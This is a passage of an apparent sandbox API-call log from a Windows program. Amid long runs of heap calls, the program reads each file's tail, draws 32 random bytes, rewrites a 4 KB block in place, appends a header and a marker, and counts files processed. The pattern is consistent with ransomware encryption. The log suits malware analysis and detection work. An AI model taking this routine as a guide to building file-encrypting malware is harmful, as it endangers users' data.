GetProcessHeap () returned 0x4f10000 [0081.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.539] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.539] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0081.539] GetProcessHeap () returned 0x4f10000 [0081.540] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.540] GetProcessHeap () returned 0x4f10000 [0081.540] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0081.540] GetProcessHeap () returned 0x4f10000 [0081.540] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.540] GetProcessHeap () returned 0x4f10000 [0081.540] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.540] GetProcessHeap () returned 0x4f10000 [0081.540] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.540] GetProcessHeap () returned 0x4f10000 [0081.540] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.540] GetProcessHeap () returned 0x4f10000 [0081.540] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.540] GetProcessHeap () returned 0x4f10000 [0081.540] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.540] GetProcessHeap () returned 0x4f10000 [0081.540] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.540] GetProcessHeap () returned 0x4f10000 [0081.540] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.540] GetProcessHeap () returned 0x4f10000 [0081.540] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.540] GetProcessHeap () returned 0x4f10000 [0081.540] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.540] GetProcessHeap () returned 0x4f10000 [0081.540] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.540] GetProcessHeap () returned 0x4f10000 [0081.540] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.540] GetProcessHeap () returned 0x4f10000 [0081.540] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.540] GetProcessHeap () returned 0x4f10000 [0081.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.541] GetProcessHeap () returned 0x4f10000 [0081.541] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.541] GetProcessHeap () returned 0x4f10000 [0081.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.541] GetProcessHeap () returned 0x4f10000 [0081.541] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.541] GetProcessHeap () returned 0x4f10000 [0081.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.541] GetProcessHeap () returned 0x4f10000 [0081.541] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.541] GetProcessHeap () returned 0x4f10000 [0081.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.541] GetProcessHeap () returned 0x4f10000 [0081.541] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.541] GetProcessHeap () returned 0x4f10000 [0081.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.541] GetProcessHeap () returned 0x4f10000 [0081.541] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.541] GetProcessHeap () returned 0x4f10000 [0081.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.541] GetProcessHeap () returned 0x4f10000 [0081.541] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0081.541] GetProcessHeap () returned 0x4f10000 [0081.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.541] GetProcessHeap () returned 0x4f10000 [0081.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0081.541] GetProcessHeap () returned 0x4f10000 [0081.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0081.541] GetProcessHeap () returned 0x4f10000 [0081.541] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0081.541] GetProcessHeap () returned 0x4f10000 [0081.542] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0081.542] SetFilePointerEx (in: hFile=0x888, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.542] WriteFile (in: hFile=0x888, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0081.557] WriteFile (in: hFile=0x888, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0081.557] GetProcessHeap () returned 0x4f10000 [0081.558] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0081.558] GetProcessHeap () returned 0x4f10000 [0081.558] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0081.558] GetProcessHeap () returned 0x4f10000 [0081.558] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0081.558] CloseHandle (hObject=0x888) returned 1 [0081.559] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 67 [0081.559] SetFilePointerEx (in: hFile=0x88c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.559] ReadFile (in: hFile=0x88c, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0081.560] SetFilePointerEx (in: hFile=0x88c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.560] GetProcessHeap () returned 0x4f10000 [0081.560] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0081.560] GetProcessHeap () returned 0x4f10000 [0081.560] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0081.560] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0081.560] GetProcessHeap () returned 0x4f10000 [0081.560] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0081.560] ReadFile (in: hFile=0x88c, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0081.607] SetFilePointerEx (in: hFile=0x88c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.607] WriteFile (in: hFile=0x88c, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0081.607] GetProcessHeap () returned 0x4f10000 [0081.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0081.607] GetProcessHeap () returned 0x4f10000 [0081.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.608] GetProcessHeap () returned 0x4f10000 [0081.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.609] GetProcessHeap () returned 0x4f10000 [0081.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0081.610] GetProcessHeap () returned 0x4f10000 [0081.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.610] GetProcessHeap () returned 0x4f10000 [0081.610] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0081.610] GetProcessHeap () returned 0x4f10000 [0081.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0081.610] GetProcessHeap () returned 0x4f10000 [0081.610] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0081.610] GetProcessHeap () returned 0x4f10000 [0081.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0081.610] GetProcessHeap () returned 0x4f10000 [0081.610] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0081.610] GetProcessHeap () returned 0x4f10000 [0081.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0081.610] GetProcessHeap () returned 0x4f10000 [0081.610] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.610] GetProcessHeap () returned 0x4f10000 [0081.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0081.610] GetProcessHeap () returned 0x4f10000 [0081.610] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.610] GetProcessHeap () returned 0x4f10000 [0081.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.610] GetProcessHeap () returned 0x4f10000 [0081.610] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.610] GetProcessHeap () returned 0x4f10000 [0081.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.610] GetProcessHeap () returned 0x4f10000 [0081.610] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.611] GetProcessHeap () returned 0x4f10000 [0081.611] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.611] GetProcessHeap () returned 0x4f10000 [0081.611] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.611] GetProcessHeap () returned 0x4f10000 [0081.611] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.611] GetProcessHeap () returned 0x4f10000 [0081.611] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.611] GetProcessHeap () returned 0x4f10000 [0081.611] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.611] GetProcessHeap () returned 0x4f10000 [0081.611] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.611] GetProcessHeap () returned 0x4f10000 [0081.611] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.611] GetProcessHeap () returned 0x4f10000 [0081.611] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.611] GetProcessHeap () returned 0x4f10000 [0081.611] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.611] GetProcessHeap () returned 0x4f10000 [0081.611] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.611] GetProcessHeap () returned 0x4f10000 [0081.611] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.611] GetProcessHeap () returned 0x4f10000 [0081.611] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.611] GetProcessHeap () returned 0x4f10000 [0081.611] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.612] GetProcessHeap () returned 0x4f10000 [0081.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.612] GetProcessHeap () returned 0x4f10000 [0081.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.612] GetProcessHeap () returned 0x4f10000 [0081.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.612] GetProcessHeap () returned 0x4f10000 [0081.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.612] GetProcessHeap () returned 0x4f10000 [0081.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.612] GetProcessHeap () returned 0x4f10000 [0081.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.612] GetProcessHeap () returned 0x4f10000 [0081.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0081.612] GetProcessHeap () returned 0x4f10000 [0081.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.612] GetProcessHeap () returned 0x4f10000 [0081.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0081.612] GetProcessHeap () returned 0x4f10000 [0081.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0081.612] GetProcessHeap () returned 0x4f10000 [0081.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0081.612] GetProcessHeap () returned 0x4f10000 [0081.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0081.612] SetFilePointerEx (in: hFile=0x88c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.612] WriteFile (in: hFile=0x88c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0081.613] WriteFile (in: hFile=0x88c, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0081.613] GetProcessHeap () returned 0x4f10000 [0081.613] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0081.613] GetProcessHeap () returned 0x4f10000 [0081.613] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0081.613] GetProcessHeap () returned 0x4f10000 [0081.613] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0081.613] CloseHandle (hObject=0x88c) returned 1 [0081.615] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 68 [0081.615] SetFilePointerEx (in: hFile=0x890, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.615] ReadFile (in: hFile=0x890, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0081.615] 